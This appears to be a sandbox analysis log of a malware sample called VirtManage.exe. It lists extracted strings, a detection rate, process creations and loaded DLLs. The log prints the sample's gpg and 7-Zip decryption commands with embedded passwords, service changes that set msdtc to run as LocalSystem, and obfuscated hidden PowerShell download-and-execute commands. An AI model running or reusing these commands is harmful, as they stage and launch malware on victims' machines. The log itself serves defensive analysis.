Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: select version from version;
Source: gpg.exe, gpg.exe, 00000003.00000002.921015417.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.932022027.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.993208467.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000C.00000002.998574183.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: create table signatures (binding INTEGER NOT NULL, sig_digest TEXT, origin TEXT, sig_time INTEGER, time INTEGER, primary key (binding, sig_digest, origin));
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: update bindings set effective_policy = %d, conflict = %Q where email = %Q and fingerprint = %Q and effective_policy != %d;
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: select count(*) from sqlite_master where type='table';error reading TOFU database: %s
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: update bindings set effective_policy = ? where fingerprint = ?;
Source: VirtManage.exeVirustotal: Detection: 13%
Source: gpg.exeString found in binary or memory: full-help
Source: gpg.exeString found in binary or memory: i386/mpih-add1.S:i386/mpih-sub1.S:i386/mpih-mul1.S:i386/mpih-mul2.S:i386/mpih-mul3.S:i386/mpih-lshift.S:i386/mpih-rshift.S
Source: gpg.exeString found in binary or memory: full-help
Source: C:\Users\user\Desktop\VirtManage.exeFile read: C:\Users\user\Desktop\VirtManage.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\VirtManage.exe "C:\Users\user\Desktop\VirtManage.exe"
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\5FILE.1A.gpg
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.dll --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\1FILE.1A.gpg
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\2FILE.1A.gpg
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI
Source: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i "C:\ProgramData\Microsoft\MicrosoftAPI\RVTools.msi"
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\Cert.txt --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\3FILE.1A.gpg
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\4FILE.1A.gpg
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6DE2D63DBA183F9FE048D9EF7023AC72 C
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config msdtc start= demand
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config msdtc obj= "LocalSystem"
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: unknownProcess created: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe "C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe"
Source: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:zX 'Net.WebClient';Set-Variable G8E $('C:\Pro'+'gramDat'+'a\Micro'+'soft\Update'+'Desktop\eep6d'+'i0uGu.t');dir rid*;Set-Variable kAl (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'G*d'}).Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('N*-O*',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)(GI Variable:\zX).Value);Set-Item Variable:/75 ((((DIR Variable:\kAl).Value|Member)|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'D*g'}).Name);$ExecutionContext|ForEach{(Get-Item Variable:/_).Value.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'*ke*pt'}).Name).Invoke((DIR Variable:\kAl).Value.((GV 75 -Va)).Invoke((ChildItem Variable:/G8E).Value))}"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D22.tmp" "c:\Users\user\AppData\Local\Temp\2s4bn4bw\CSC355371FC2ED34AC6B0D2C6DC18B9358D.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e3jseyke.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6B4F.tmp" "c:\Users\user\AppData\Local\Temp\CSCC2520B897D0D4F99AF1935CDE7767C35.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\5FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.dll --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\1FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\2FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPIJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i "C:\ProgramData\Microsoft\MicrosoftAPI\RVTools.msi"Jump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\Cert.txt --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\3FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\4FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPIJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\2FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config msdtc obj= "LocalSystem"Jump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6DE2D63DBA183F9FE048D9EF7023AC72 CJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:zX 'Net.WebClient';Set-Variable G8E $('C:\Pro'+'gramDat'+'a\Micro'+'soft\Update'+'Desktop\eep6d'+'i0uGu.t');dir rid*;Set-Variable kAl (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'G*d'}).Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('N*-O*',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)(GI Variable:\zX).Value);Set-Item Variable:/75 ((((DIR Variable:\kAl).Value|Member)|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'D*g'}).Name);$ExecutionContext|ForEach{(Get-Item Variable:/_).Value.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'*ke*pt'}).Name).Invoke((DIR Variable:\kAl).Value.((GV 75 -Va)).Invoke((ChildItem Variable:/G8E).Value))}"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e3jseyke.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D22.tmp" "c:\Users\user\AppData\Local\Temp\2s4bn4bw\CSC355371FC2ED34AC6B0D2C6DC18B9358D.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6B4F.tmp" "c:\Users\user\AppData\Local\Temp\CSCC2520B897D0D4F99AF1935CDE7767C35.TMP"
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: dui70.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: duser.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: chartv.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libassuan-9.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgcrypt-20.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libnpth-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libsqlite3-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: zlib1.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: profapi.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libassuan-9.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgcrypt-20.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libnpth-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libsqlite3-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: zlib1.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: profapi.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libassuan-9.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgcrypt-20.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libnpth-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libsqlite3-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: zlib1.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: profapi.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
